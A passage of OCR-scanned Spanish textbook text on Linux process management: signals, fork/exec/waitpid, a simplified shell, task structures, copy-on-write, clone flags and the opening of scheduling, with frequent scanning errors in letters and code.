utilizan tal vez no sean portátiles a otras versiones de Linux y UNIX en general. 

10.3.2 Llamadas al sistema para administrar procesos en Linux 

Ahora veamos las llamadas al sistema de Linux que tratan con la administración de los procesos. 
Las principales se listan en la figura 10-6. Fork es un buen lugar para empezar el análisis. La 
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Señal 

Causa 

SIGABRT 

Se envía para abortar un proceso y forzar un vaciado de núcleo 

SIGALRM 

Se activó el reloj de alarma 

SIGFPE 

Ocurrió un error de punto flotante (por ejemplo, división entre 0) 

SIGHUP 

La línea telefónica que utilizaba el proceso se colgó 

SIGILL 

El usuario oprimió SUPR para interrumpir el proceso 

SIGQUIT 

El usuario oprimió la tecla que solicita un vaciado de núcleo 

SIGKILL 

Se envió para eliminar un proceso (no se puede atrapar ni ignorar) 

SIGPIPE 

El proceso escribió en una tubería que no tiene lectores 

SIGSEGV 

El proceso hizo referencia a una dirección de memoria inválida 

SIGTERM 

Se utiliza para solicitar que un proceso termine en forma correcta 

SIGUSR1 

Disponible para propósitos definidos por la aplicación 

SIGUSR2 

Disponible para propósitos definidos por la aplicación 


Figura 10-5. Las señales requeridas por POSIX. 


llamada al sistema fork, que otros sistemas UNIX tradicionales también aceptan, es la principal 
forma de crear un nuevo proceso en sistemas Linux (en la siguiente subsección analizaremos otra 
alternativa). Crea un duplicado exacto del proceso original, incluyendo todos los descriptores de 
archivos, registros y todo lo demás. Después de fork, el proceso original y la copia (el padre y el 
hijo) van por caminos separados. Todas las variables tienen valores idénticos al momento de fork, 
pero como se copia todo el espacio de direcciones del padre para crear el hijo, los cambios poste¬ 
riores en uno de ellos no afectan al otro. La llamada a fork devuelve un valor que es cero en el hi¬ 
jo, y es igual al PID del hijo en el padre. Mediante el uso del PID devuelto, los dos procesos 
pueden ver cuál es el padre y cuál el hijo. 

En la mayoría de los casos, después de fork el hijo tendrá que ejecutar código distinto al del 
padre. Considere el caso de un shell. Lee un comando déla terminal, bifurca un proceso hijo, espe¬ 
ra a que el hijo ejecute el comando y después lee el siguiente comando cuando el hijo termina. Para 
esperara que el hijo termine, el padre ejecuta una llamada al sistema waitpid, que sólo espera a que 
el hijo termine (cualquier hijo, si existe más de uno), waitpid tiene tres parámetros. El primero per¬ 
mite al proceso que hizo la llamada esperar a un hijo específico. Si es -1, puede ser cualquier hi¬ 
jo anterior (es decir, el primer hijo que termine). El segundo parámetro es la dirección de una 
variable que se establecerá con el estado de salida del hijo (terminación normal o anormal y valor 
de salida). El tercero determina si el proceso que hizo la llamada se bloquea o regresa si ningún hi¬ 
jo ha terminado. 

En el caso del shell, el proceso hijo debe ejecutar el comando escrito por el usuario. Para ello 
utiliza la llamada al sistema exec, la cual hace que la imagen de todo su núcleo se reemplace por el 
archivo nombrado en su primer parámetro. En la figura 10-7 se muestra un shell muy simplificado, 
en el que se ilustra el uso de fork, waitpid y exec. 
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Llamada al sistema 

Descripción 

pid = fork{) 

Crea un proceso hijo idéntico al padre 

pid = waitpidípid, &statioc, opts) 

Espera a que un hijo termine 

s = execve(name, argv, envp) 

Reemplaza la imagen del núcleo de un proceso 

exit(status) 

Termina la ejecución del proceso y devuelve el estado 

s = sigaction(sig, &act, Soldad) 

Define la acción a realizar en las señales 

s = sigreturn(&context) 

Regresa de una señal 

s = sigprocmask(how, &set, &old) 

Examina o cambia la máscara de la señal 

s = sigpending(set) 

Obtiene el conjunto de señales bloqueadas 

s = sigsuspend(sigmask) 

Reemplaza la máscara de la señal y suspende el proceso 

s = kill{pid, sig) 

Envía una señal a un proceso 

residual = alarm(seconds) 

Establece el reloj de alarma 

s = pause{) 

Suspende el proceso que hizo la llamada hasta la siguiente señal 


Figura 10-6. Algunas llamadas al sistema relacionadas con los procesos. El código de 
retorno s es -1 si ocurre un error, pid es un ID de proceso y residual es el tiempo res¬ 
tante en la alarma anterior. Los parámetros son lo que los nombres sugieren. 

En el caso más general, exec tiene tres parámetros: el nombre del archivo que se va a ejecutar, 
un apuntador al arreglo de argumentos y un apuntador al arreglo del entorno (más adelante describi¬ 
remos cada uno). Se proporcionan varios procedimientos de biblioteca, como execi, execv, execle y 
execve para permitir que se omitan los parámetros, o que se especifiquen de varias formas. Todos es¬ 
tos procedimientos invocan la misma llamada al sistema subyacente. Aunque la llamada al sistema 
es exec, no hay un procedimiento de biblioteca con este nombre: se debe utilizar uno de los otros. 

Vamos a considerar el caso de un comando que se escribe al shell, como 

cp archivof archivo2 

que se utiliza para copiar archivol en archivo2. Después de la bifurcación del shell, el hijo locali¬ 
za y ejecuta el archivo cp y le pasa información sobre los archivos que debe copiar. 

El programa principal de cp (y muchos otros programas) contiene la declaración de funciones 

main (argc, argv, envp) 

donde argc es la cuenta del número de elementos en la línea de comandos, incluyendo el nombre 
del programa. Para el ejemplo anterior, argc es 3. 

El segundo parámetro (argv) es un apuntador a un arreglo. El elemento i de ese arreglo es un 
apuntador a la i-ésima cadena en la línea de comandos. En nuestro ejemplo, argvjO] apuntaría a la 
cadena "cp". De manera similar, argvjl] apuntaría a la cadena "archivol" de ocho caracteres, y argv 
[2] debería apuntar a la cadena de ocho caracteres "archivo2". 

El tercer parámetro de main (envp) es un apuntadora! entorno, un arreglo de cadenas que contie¬ 
nen asignaciones de la forma nombre = valor que se utiliza para pasar información a un programa. 
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wh¡le(TRUE){ 
escribir_indicador(); 
leer_comando{comando, parama); 


/* se repite para siempre /*/ 

/* muestra ei prompt en ia pantaiia */ 

/* iee ia iínea de entrada dei teciado 7 


pid = fork(); 
if (pid < 0) { 


/* bifurca un proceso hijo 7 


printf(“No se puedo bifurcarO); 
continué; 


/* condición de error 7 
/* repite ei cicio 7 


if (pid != 0) { 


waitpid (-1, Sestado, 0); 


/* ei padre espera ai hijo 7 


} eise { 


execve(comando, parama, 0); 


/* ei hijo hace ei trabajo 7 


Figura 10.7. Un shell muy simplificado. 


como el tipo de terminal y el nombre del directorio de inicio. En la figura 10-7 no se pasa un entorno 
al hijo, por lo que el tercer parámetro de execve es cero en este caso. 

Si exec le parece complicado, no desespere: es la llamada al sistema más compleja. El resto de 
las llamadas son más simples. Como ejemplo de una llamada simple considere exit, que los proce¬ 
sos deben usar al terminar su ejecución. Tiene un parámetro: el estado de salida (0 a 255), el cual 
se devuelve al padre en la variable status de la llamada al sistema waitpid. El byte de orden infe¬ 
rior de status contiene el estado determinación, donde 0 es la terminación normal y los otros valo¬ 
res son diversas condiciones de error. El byte de orden superior contiene el estado de salida del hijo 
(0 a 255), según lo especificado en la llamada del hijo a exit. Por ejemplo, si un proceso padre eje¬ 
cuta la instrucción 

n = waitpicl(-1, Sstatus, 0); 

el proceso se suspenderá hasta que alguno de sus hijos termine. Por ejemplo, si el hijo termina con el 
valor 4 como parámetro para exit, cuando el padre se despierte, n tendrá el PID del hijo y status se¬ 
rá 0x0400 (el prefijo Ox indica un valor hexadecimal en C). El byte de orden inferior de status 
se relaciona con las señales: el siguiente es el valor que el hijo devolvió en su llamada a exit. 

Si un proceso termina y su padre todavía no lo espera, el proceso entra en un tipo de animación 
suspendida, conocida como estado zombie. Cuando por fin el padre lo está esperando, el proceso 
termina. 

Hay varias llamadas al sistema relacionadas con las señales, que se utilizan de vari as formas. Por 
ejemplo, si un usuario indica por accidente a un editor de texto que muestre el contenido completo 
de un archivo muy extenso y después se da cuenta del error, se necesita alguna forma de interrumpir 
al editor. La opción usual es que el usuario oprima cierta tecla especial (por ejemplo, SUPR o 
CTRL-C) que envíe una señal al editor. Éste atrapará la señal y detendrá la impresión. 
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Para anunciar que está dispuesto a atrapar esta señai (o cuaiquier otra), ei proceso puede usar 
ia iiamada ai sistema sigaction. Ei primer parámetro es ia señai que se va a atrapar (vea ia figura 
10-5). Ei segundo es un apuntador a una estructura que proporciona un apuntador ai procedimien¬ 
to de manejo de señaies, así como otros bits y banderas. Ei tercero apunta a una estructura en iaque 
ei sistema devueive ia información sobre ei manejo de señaies que está en efecto, en caso de que se 
tenga que restaurar después. 

Ei manejador de señaies se puede ejecutar todo ei tiempo que quiera. Sin embargo, en ia prác¬ 
tica es común encontrar manejadoras de señaies muy cortos. Cuando termina ei procedimiento de 
manejo de señaies, regresa ai punto desde ei cuai se interrumpió. 

La iiamada ai sistema sigaction también se puede utiiizar para hacer que se ignore una señai, 
o para restaurar i a acción predeterminada, que es ei i minar ei proceso. 

Oprimir SUPR no es ia única forma de enviar una señai. La iiamada ai sistema kiii permite 
que un proceso envíe una señai a otro proceso reiacionado. La eiección dei nombre "kiii" para es¬ 
ta iiamada ai sistema no es muy buena, ya que ia mayoría de ios procesos envían señaies a otros 
procesos con ia intención de que se atrapen. 

Para muchas apiicaciones en tiempo reai, hay que interrumpir un proceso después de un inter- 
vaio específico para reaiizar una acción, como voiver a transmitir un paquete que puede haberse 
perdido a través de una iínea de comunicación no confiabie. Para manejar esta situación se utiiiza 
ia iiamada ai sistema aiam. Ei parámetro especifica un intervaio en segundos, después dei cuai 
se envía una señai SIGA LA RM al proceso. Un proceso sólo puede tener una alarma pendiente en 
cualquier momento. Si se hace una llamada a aiarm con un parámetro de 10 segundos, y 3 segun¬ 
dos después se hace otra llamada a aiarm con un parámetro de 30 segundos, sólo se generará una 
señal 20 segundos después de la segunda llamada. La segunda llamada a aiarm cancela a la prime¬ 
ra. Si no se atrapa una señal de alarma, se realiza la acción predeterminada y se elimina el proceso 
al que se envió la señal. Técnicamente, las señales de alarma se pueden ignorar, pero eso no tiene 
sentido. 

A Igunas veces sucede que un proceso no tiene nada que hacer hasta que llegue una señal. Por 
ejemplo, considere un programa de capacitación asistida por computadora, que evalúa la velocidad 
de lectura y la comprensión. M uestra cierto texto en la pantalla y después llama a aiarm para que le 
envíe una señal después de 30 segundos. M ientras el estudiante lee el texto, el programa no tiene 
nada qué hacer. Podría esperar en un ciclo estrecho sin hacer nada, pero eso desperdiciaría tiempo 
de la CPU, que un proceso en segundo plano u otro usuario podrían necesitar. Una mejor solución 
es utilizar la llamada al sistema pause, que indica a Linux que debe suspender el proceso hasta que 
llegue la próxima señal. 


10.3.3 I mplementación de procesos e hilos en L inux 

En Linux, un proceso es como un iceberg: lo que podemos ver es la parte que está por encima del 
agua, pero por debajo también hay una parte importante. Cada proceso tiene una parte de usuario 
que ejecuta el programa de usuario. Sin embargo, cuando uno de sus hilos realiza una llamada al 
sistema, se atrapa en modo de kernel y empieza a ejecutarse en el contexto del kernel, con un ma- 
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pa de memoria distinto y acceso compieto a todos ios recursos de ia máquina. Sigue siendo ei mis¬ 
mo hiio, pero con más poder y también con su propia piia en modo dekernei y su contador dei pro¬ 
grama en modo dekernei. Estos ei ementas son importantes, ya que una iiamada ai sistema se puede 
iiegara bioquearen ei proceso, porejempio ai esperar que se compiete una operación de disco. Des¬ 
pués, ei contador dei programa y ios registros se guardan para que ei hiio se pueda reiniciar en mo¬ 
do de kernei más adeiante. 

Ei kernei de Linux representa a ios procesos de manera interna como tareas, a través de i a es¬ 
tructura task_struct. A diferencia de ios métodos de otros sistemas operativos, que distinguen entre 
un proceso, un proceso iigero y un hiio, Linux utiiiza ia estructura de tarea para representar cuai- 
quier contexto de ejecución. Por io tanto, un proceso con un soio hiio se representará con una es¬ 
tructura de tarea, y un proceso muitihiio tendrá una estructura de tarea para cada uno de ios hiios a 
nivei de usuario. Por úitimo, ei mismo kernei es muitihiio, y tiene hiios a nivei de kernei que no es¬ 
tán asociados con ningún proceso de usuario y ejecutan código dei kernei. M ás adeiante en esta sec¬ 
ción regresaremos a ios procesos muitihiio (y ios hiios en generai), y ios anaiizaremos con más 
detai i e. 

Para cada proceso hay un descriptor dei tipo task_struct resi dente en memoria, en todo momen¬ 
to. Este descriptor contiene ia información vitai necesaria para que ei kernei administre todos ios 
procesos, inciuyendo ios parámetros de programación, ias iistas de descriptores de archivos abier¬ 
tos, etcétera. Ei descriptor de proceso y i a memoria para i a piia dei proceso en modo de kernei se 
crean ai momento en que se crea ei proceso. 

Para tenercompatibiiidad con otros sistemas UN IX, Linux identifica a ios procesos a través dei 
Identificador de proceso (PID). Ei kernei organiza todos ios procesos en una iista dobiemente en- 
iazada de estructuras de tareas. A demás de utiiizario para recorrer ias iistas eniazadas y acceder a 
ios descriptores de procesos, ei PID se puede asignar a ia dirección de ia estructura de tarea, y se 
puede acceder a i a información dei proceso de inmediato. 

La estructura de tarea contiene varios campos. A igunos deeiios contienen apuntadores a otras 
estructuras de datos o segmentos, como ios que contienen información sobre ios archivos abiertos. 
A igunos de estos segmentos se reiacionan con ia estructura dei proceso a nivei de usuario, que no 
es de interés cuando ei proceso de usuario no se puede ejecutar. Por io tanto, estos campos se pue¬ 
den intercambiar o paginar hacia fuera de ia memoria, para no desperdiciada en información que 
no es necesaria. Por ejempio, aunque es posibie que un proceso reciba una señai ai momento de in¬ 
tercambiado hacia fuera de ia memoria, no es posibie que iea un archivo. Por esta razón, ia infor¬ 
mación sobre ias señai es debe estar en memoria en todo momento, inciuso aunque ei proceso no 
esté presente en ia memoria. Por otra parte, ia información sobre ios descriptores de archivos se 
puede mantener en ia estructura dei usuario y se puede iievar a ia memoria sóio cuando ei proceso 
se encuentre también en memoria y se pueda ejecutar. 

La información en ei descriptor dei proceso se puede ciasificar en ias siguientes catego¬ 
rías: 


1. Parámetros de planificación. Prioridad dei proceso, cantidad de tiempo de ia CPU que 
consumió recientemente, tiempo que ha estado inactivo recientemente. En conjunto, es¬ 
tos parámetros se utiiizan para determinar qué proceso se debe ejecutar a continuación. 
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2. Imagen de memoria. Apuntadores a los segmentos de texto, datos y pila, o tablas de pági¬ 
nas. Si el segmento de texto es compartido, el apuntador de texto apunta a la tabla de texto 
compartida. Cuando el proceso no está en memoria, la información sobre cómo encontrar 
sus partes en el disco también se encuentra aquí. 

3. Señales. M áscaras que muestran qué señales se ignoran, qué señales se atrapan, cuáles se 
bloquean en forma temporal y cuáles están en proceso de entregarlas. 

4. Registros de la máquina. Cuando ocurre una trampa en el kernel, los registros de la má¬ 
quina (incluyendo los de punto flotante, si se utilizan) se guardan aquí. 

5. Estado de llamada al sistema. Información sobre la llamada al sistema actual, incluyendo 
sus parámetros y resultados. 

6. Tabla de descriptores de archivos. Cuando se invoca una llamada en la que se involucra 
un descriptor de archivos, se utiliza ese descriptor como índice en esta tabla para localizar 
la estructura de datos dentro del núcleo (nodo-i) que corresponde a este archivo. 

7. Contabilidad. Apuntador a una tabla que lleva la cuenta del tiempo de la CPU de usuario 
y de sistema que utilizó el proceso. Algunos sistemas también mantienen límites aquí en 
cuanto a la cantidad de tiempo de CPU que puede utilizar un proceso, el tamaño máximo de 
su pila, el número de marcos de página que puede consumir y otros elementos. 

8. Pila del kernel. Una pila fija para que la parte del kernel del proceso la utilice. 

9. M isceláneos. Estado actual del proceso, el evento que se espera (si lo hay), tiempo que de¬ 
be transcurrir para que se active la alarma, PID, PID del proceso padre, identificación 
de usuario y de grupo. 

Al tener esta información en cuenta, es fácil explicar cómo se crean los procesos en Linux. El 
mecanismo para crear un nuevo proceso es en realidad muy simple. Se crean un nuevo descriptor 
de proceso y un área de usuario para el proceso hijo, y se llenan en gran parte con los datos del pa¬ 
dre. El hijo recibe un PID, se establece su mapa de memoria y recibe acceso compartido a los ar¬ 
chivos del padre. Después se establecen sus registros y está listo para ejecutarse. 

Cuando se ejecuta una llamada al sistema fork, el proceso que hizo la llamada se atrapa en el 
kernel y crea una estructura de tarea junto con otras estructuras de datos adicionales, como la pila 
en modo de kernel y la estructura thread_info. Esta estructura se asigna en un desplazamiento fijo 
a partir del final de la pila del proceso y contiene pocos parámetros del mismo, junto con la direc¬ 
ción del descriptor del proceso. Al almacenar la dirección del descriptor del proceso en una ubicación 
fija, Linux necesita sólo unas cuantas operaciones eficientes para localizarla estructura de tarea pa¬ 
ra un proceso en ejecución. 

La mayor parte del contenido del descriptor del proceso se llena con base en los valores del 
descriptor del padre. Después Linux busca un PID disponible y actualiza la entrada en la tabla de 
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hash de Pl Ds para que apunte a la nueva estructura de tarea. E n caso de col isiones en la tabla de hash, 
los descriptores de procesos se pueden encadenar. También establece los campos en task_struct pa¬ 
ra que apunten al proceso anterlor/sigulente correspondiente en el arreglo de tareas. 

En principio, en este punto debería asignar la memoria para los segmentos de datos y de pila 
del hijo, y realizar coplas exactas de los segmentos del padre, ya que la semántica de fork Indica 
que no se debe compartir memoria entre padre e hijo. El segmento de texto se puede copiar o com¬ 
partir, ya que es de sólo lectura. En este punto, el hijo está listo para ejecutarse. 

Sin embargo, se requieren muchos recursos para copiar la memoria, por lo que todos los siste¬ 
mas Linux modernos hacen trampa: proporcionan al hijo sus propias tablas de páginas, pero hacen 
que apunten a las páginas del padre, marcándolas como de sólo lectura. Cada vez que el hijo trata 
de escribir en una página, recibe un fallo de protección. El kernel ve esto y asigna una nueva copla de 
la página al hijo, y la marca como de lectura/escritura. De esta forma, se tienen que copiar sólo las 
páginas en las que realmente se vayan a escribir datos. A este mecanismo se le conoce como copia 
al escribir. Tiene el beneficio adicional de no requerir dos coplas del programa en la memoria, con 
lo cual se ahorra RA M . 

Una vez que el proceso hijo empieza a ejecutarse, el código que se ejecuta ahí (una copla del 
Shell) realiza una llamada al sistema exec y proporciona el nombre del comando como parámetro. 
A hora el kernel busca y verifica el archivo ejecutable, copla los argumentos y las cadenas de entor¬ 
no en el kernel, y libera el espacio de direcciones antiguo, junto con sus tablas de páginas. 

Ahora se debe crear y llenar el nuevo espacio de direcciones. SI el sistema acepta archivos por 
asignación, como Linux y otros sistemas basados en UNIX, se establecen las nuevas tablas de pá¬ 
ginas para Indicar que no hay páginas en memoria, excepto tal vez una página de la pila, pero que 
el espacio de direcciones está respaldado por el archivo ejecutable en el disco. Cuando el nuevo 
proceso empiece a ejecutarse, recibirá de Inmediato un fallo de página y la primera página de có¬ 
digo se paginará desde el archivo ejecutable. De esta forma no hay que cargar nada por adelanta¬ 
do, y así los programas pueden Iniciar con rapidez y recibir fallos sólo en las páginas que necesitan 
(esta estrategia es la paginación bajo demanda en su forma más pura, como vimos en el capítulo 
3). Por último, se copian los argumentos y cadenas de entorno a la nueva pila, se restablecen las 
señales y los registros se Iniclallzan con cero. En este punto, el nuevo comando puede empezar a 
ejecutarse. 

En la figura 10-8 se Ilustran los pasos antes descritos, por medio del siguiente ejemplo: un 
usuario escribe un comando is en la terminal, el shell crea un nuevo proceso al bifurcar un clon de 
sí mismo. Después, el nuevo shell llama a exec para cubrir su memoria con el contenido del archi¬ 
vo ejecutable Is. 


Hiiosen Linux 

En el capítulo 2 analizamos las generalidades de los hilos. Aquí nos enfocaremos en los hilos del 
kernel en Linux, con un enfoque específico en las diferencias entre el modelo de hilos de Linux y 
otros sistemas UNIX. Para comprender mejor las capacidades únicas que nos ofrece el modelo de 
Linux, empezaremos con un análisis de algunas de las decisiones desafiantes presentes en los sis¬ 
temas multihilo. 
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Asigna la estructura de tarea del hijo 

Llena la estructura de tarea del hijo con los datos del padre 

Asigna la pila y el área de usuario del hijo 

Llena el área de usuario del hijo con los datos del padre 

Asigna PID para el hijo 

Establece el hijo para que comparta el texto del padre 
Copia tablas de páginas para datos y pila 
Establece la compartición de los archivos abiertos 
Copia los registros del padre al hijo 


Busca el programa ejecutable 
Verifica el permiso de ejecución 
Lee y verifica el encabezado 
Copia argumentos y entorno ai kernel 
Libera el antiguo espacio de direcciones 
Asigna el nuevo espacio de direcciones 
Copia argumentos y entorno a la pila 
Restablece las señales 
Inicializa los registros 


Figura 10-8. Los pasos para ejecutar el comando Is que se escribe en el Shell. 


La cuestión principal al introducir hiios es mantener ia semántica tradicionai correcta de 
UNIX. Primero consideremos a fonk. Suponga que un proceso con varios hiios (dei kernei) reaii- 
za una iiamada ai sistema fork. ¿Se deben crear ios otros hiios en ei nuevo proceso? Por ei mo¬ 
mento, vamos a responder esa pregunta en forma afirmativa. Suponga que uno de ios otros hiios 
sebioqueó ai ieerdei teci ado. ¿Se debe bioquear también ei hi i o correspondiente en ei nuevo pro¬ 
ceso ai ieer dei teciado? De ser así, ¿cuái hiio obtiene ia siguiente iínea que se escriba? En caso 
contrario, ¿qué debe hacer ese hiio en ei nuevo proceso? Ei mismo probiema se apiica a muchas 
otras cosas que pueden hacer ios hiios. En un proceso con un soio hiio no se produce este probie¬ 
ma, ya que ei único hiio no se puede bioquear ai iiamar a fork. Ahora considere ei caso en ei que 
ios otros hiios no se crean en ei proceso hijo. Suponga que uno de ios hiios no creados contiene 
un mutex que ei único hiio en ei nuevo proceso trata de adquirir después de ia iiamada a fork. Ei 
mutex nunca se iiberará y ese hiio único esperará para siempre. También existen muchos otros pro- 
biemas. No hay una soiución simpie. 

La E/S de archivos es otra área probiemática. Suponga que un hiio se bioquea ai ieer de un ar¬ 
chivo y otro hiio cierra ese archivo o reaiiza una operación iseek para cambiar ei apuntador de 
archivo actuai. ¿Qué ocurre después? ¿Quién io sabe? 

Ei manejo deseñaies es otra de ias cuestiones espinosas. ¿Se deben dirigir ias señaies a un hi¬ 
io específico, o ai proceso en generai? Tai vez una señai SIGFPE (excepción de punto fiotante) de¬ 
bería ser atrapada por ei hiio que ia produjo. ¿Qué pasa si no ia atrapa? ¿Se debe eiiminar soio ese 
hiio, o todos ios hiios? Ahora considere ia señai SIGINT, que ei usuario genera mediante ei tecia¬ 
do. ¿Qué hiio debe atrapar esa señai? ¿Deben compartir todos ios hiios un conjunto común de más¬ 
caras de señaies? Por io generai, todas ias soiuciones a éstos y otros probiemas hacen que se 












750 


CASO DE ESTUDIO 1: LINUX 


CAPITULO 10 


descomponga algo en otra parte. Obtener la semántica correcta de los hilos (sin mencionar el có¬ 
digo) no carece de importancia. 

Linux acepta los hilos del kernel de una manera interesante, que vale la pena analizar. La im- 
plementación se basa en la idea de 4.4BSD, pero los hilos del kernel no se habilitaron en esa distri¬ 
bución debido a que Berkeley se quedó sin dinero antes de poder reescribir la biblioteca de C para 
resolver los problemas antes descritos. 

H istóricamente, los procesos eran contenedores de recursos y los hilos eran las unidades de eje¬ 
cución. Un proceso contenía uno o más hilos que compartían el espacio de direcciones, los archi¬ 
vos abiertos, los manejadores de señales, las alarmas y todo lo demás. Todo era claro y simple, 
como se describió antes. 

En el 2000, Linux introdujo una nueva y poderosa llamada al sistema: clone, que disolvió la 
distinción entre procesos e hilos, y posiblemente hasta invirtió la primacía de los dos conceptos. 
Clone no está presente en ninguna otra versión de UNIX. Tradicional mente, cuando se creaba un 
hilo, el (los) hilo(s) original(es) compartía(n) todo con el nuevo, excepto sus registros. En especial, 
los descriptores de los archivos abiertos, los manejadores de señales, las alarmas y otras propieda¬ 
des globales eran para cada proceso, no para cada hilo. La llamada a clone hizo posible que cada 
uno de estos y otros aspectos fueran específicos para cada proceso o cada hilo. La llamada se hace 
de la siguiente manera: 

pid = clone(función, pila_ptr, banderas_compart, arg); 

La llamada crea un hilo, ya sea en el proceso actual o en un nuevo proceso, dependiendo de bande- 
ras_compart. Si el nuevo hilo está en el proceso actual, comparte el espacio de direcciones con los 
hilos existentes, y cada escritura subsiguiente en cualquier byte del espacio de direcciones que rea¬ 
lice cualquier hilo estará visible para los demás hilos en el proceso. Por otra parte, si el espacio de 
direcciones no es compartido, entonces el nuevo hilo obtiene una copia exacta del espacio de direc¬ 
ciones, pero las subsiguientes escrituras que realice el nuevo hilo no estarán visibles para los hilos 
anteriores. Esta semántica es la misma que en la llamada a fork de POSIX. 

En ambos casos, el nuevo hilo empieza su ejecución en función, cuya llamada se realiza con 
arg como su único parámetro. Además, en ambos casos el nuevo hilo obtiene su propia pila priva¬ 
da, donde el apuntador de la pila se inicializa con pila_ptr. 

El parámetro banderas_compartes un mapa de bits que permite un detalle más fino de compar¬ 
tición que los sistemas UNIX tradicionales. Cada uno de los bits se puede establecer en forma inde¬ 
pendiente a los demás, y cada uno de ellos determina si el nuevo hilo va a copiar cierta estructura de 
datos, o si la va a compartir con el hilo que hizo la llamada. La figura 10-9 muestra algunos de los 
elementos que se pueden compartir o copiar de acuerdo con los bits en banderas_compart. 

El bitCLONE_VM determina si se va a compartir o a copiar la memoria virtual (es decir, el es¬ 
pacio de direcciones) con los hilos anteriores. Si está activado, el nuevo hilo pasa a estar con los hi¬ 
los existentes, por lo que la llamada a clone crea en efecto un nuevo hilo en un proceso existente. Si 
el bit está desactivado, el nuevo hilo obtiene su propio espacio de direcciones privado. Esto signifi¬ 
ca que el efecto de sus instrucciones store no estará visible para los hilos existentes. Este compor¬ 
tamiento es similar a fork, excepto como se indica a continuación. La creación de un espacio de 
direcciones es en efecto la definición de un nuevo proceso. 
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Bandera 

Significado ai estar activado 

Significado ai estar desactivado 

CLONE VM 

Crea un nuevo hilo 

Crea un proceso 

CLONE_FS 

Comparte umask, directorios raíz y 
de trabajo 

No los comparte 

CLONE FILES 

Comparte los descriptores de archivos 

Copia los descriptores de archivos 

CLONE_SIGHAND 

Comparte la tabla de manejadores 
de señales 

Copa la tabla 

CLONE PID 

El nuevo hilo obtiene el PID anterior 

El nuevo hilo obtiene su propio PID 

CLONE_PARENT 

El nuevo hilo tiene el mismo padre que 
el hilo que hizo la llamada 

El padre del nuevo hilo es el que 
hizo la llamada 


Figura 10-9. B its en el mapa de bits de banderas_compart. 


El bit CLONE_FS controla la compartición de los directorios raíz y de trabajo, y de la bande¬ 
ra umask. Si este bit está activado, los hilos anteriores y nuevos comparten los directorios de traba¬ 
jo, incluso si el nuevo hilo tiene su propio espacio de direcciones. Esto significa que una llamada a 
chdir realizada por un hilo cambia el directorio de trabajo del otro hilo, incluso aunque éste pueda 
tener su propio espacio de direcciones. En UNIX, una llamada a chdir realizada por un hilo siem¬ 
pre cambia el directorio de trabajo para los demás hilos en este proceso, pero nunca para los hilos 
en otro proceso. Por ende, este bit permite un tipo de compartición que no es posible en las versio¬ 
nes de UNIX tradicionales. 

El bitCLONE_FILESes análogo al bit CLON E_F S. Si se activa, el nuevo hilo comparte sus 
descriptores de archivos con los hilos anteriores, por lo que las llamadas a iseek que realice un hi¬ 
lo serán visibles para los demás, que de nuevo es como se hace normalmente para los hilos dentro 
del mismo proceso, pero no para los hilos en distintos procesos. De manera similar, CLONE_SIG- 
FIAND habilita o deshabilita la compartición de la tabla de manejadores de señales entre los hilos 
anteriores y nuevos. Si la tabla se comparte, incluso entre hilos en distintos espacios de direcciones, 
entonces el cambio del manejador en un hilo afecta a los manejadoras en los otros. CLONE_PID 
controla si el nuevo hilo obtiene su propio PID o comparte el PID de su padre. Esta característica 
es necesaria durante el inicio del sistema. Los procesos de usuario no pueden habilitarla. 

Por último, todo proceso tiene un padre. El bitCLONE_PARENT controla quién es el padre del 
nuevo hilo. Puede ser el mismo que el del hilo que hizo la llamada (en cuyo caso, el nuevo hilo es 
hermano del que hizo la llamada) o puede ser el mismo hilo que hizo la llamada, en cuyo caso el 
nuevo hilo es un hijo del que hizo la llamada. Hay otros bits más que controlan otros elementos, pe¬ 
ro son menos importantes. 

Es posible tener este nivel detallado de compartición debido a que Linux mantiene estructuras 
de datos separadas para los diversos elementos que se listan en la sección 10.3.3 (parámetros de pro¬ 
gramación, imagen de memoria, etcétera). La estructura de tarea sólo apunta a estas estructuras de 
datos, por lo que es fácil crear una estructura de datos para cada hilo clonado y hacer que apunte a 
las estructuras de datos de programación, memoria y demás estructuras del hilo anterior, o a copias 
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de ellas. Sin embargo, el hecho de que sea posible dicho nivel detallado de compartición no signi¬ 
fica que sea útil, en especial ya que las versiones de UNIX tradicionales no ofrecen esta funciona¬ 
lidad. Un programa de Linux que aproveche esta funcionalidad ya no se podrá portar a UNIX. 

El modelo de hilos de Linux presenta otra dificultad. Los sistemas de UNIX asocian un solo 
PID con un proceso, sin importar que tenga un solo hilo o varios. Para que pueda ser compatible 
con otros sistemas UNIX, Linux hace la diferencia entre un identificador de proceso (PID) y un 
identificador de tarea (TID). Ambos campos se almacenan en la estructura de tarea. Cuando se uti¬ 
liza clone para crear un nuevo proceso que no comparte nada con su creador, PID se establece con 
un nuevo valor; en caso contrario, la tarea recibe un nuevo TID pero hereda el PID. De esta forma, 
todos los hilos en un proceso recibirán el mismo PID que el primer hilo en el proceso. 

10.3.4 Planificación en Linux 

Ahora vamos a analizar el algoritmo de planificación de Linux. Para empezar, los hilos en Linux 
son hilos del kernel, por lo que la planificación se basa en hilos y no en procesos. 

Linux hace la diferencia entre tres clases de hilos para fines de planificación: 

1. Planificación "Primero en llegar. Primero en ser atendido (PIFO)", en tiempo real. 

2. Planificación circular (round-robin) en tiempo real. 

3. Tiempo compartido. 

Los hilos de planificación PIFO en tiempo real tienen la mayor prioridad y no son preferentes, ex¬ 
cepto por un hilo FIFO en tiempo real recién preparado con una mayor prioridad. Los hilos de pla¬ 
nificación circular en tiempo real son iguales que los hilos de planificación FIFO en tiempo real, 
excepto que tienen cuantos de tiempo asociados y el reloj les puede dar preferencia. Si hay varios 
hilos de planificación circular en tiempo real listos, cada uno se ejecuta durante su quantum, des¬ 
pués del cual pasa al final de la lista de hilos de planificación rotativa en tiempo real. Ninguna de 
estas clases es en realidad de tiempo real, en ningún sentido. No se pueden especificar tiempos lí¬ 
mite y no se dan garantías. Estas el ases simplemente son de mayor prioridad que los hilos en la cla¬ 
se de tiempo compartido estándar. La razón por la que Linux los llama de tiempo real es que está 
en conformidad con el estándar P 1003.4 (extensionesen "tiempo real" para UNIX), que utiliza esos 
nombres. Los hilos en tiempo real se representan en forma interna con los niveles de prioridad de 
0 a 99, donde 0 es el nivel de mayor prioridad y 99 el de menor prioridad en tiempo real. 

Los hilos convencionales que no son de tiempo real se planifican de acuerdo con el siguiente 
algoritmo. En el interior, los hilos que no son de tiempo real se asocian con los niveles de prioridad 
del 100 al 139; es decir, Linux los diferencia de manera interna entre 140 niveles de prioridad (pa¬ 
ra las tareas de tiempo real y las que no son de tiempo real). En cuanto a los hilos de planificación 
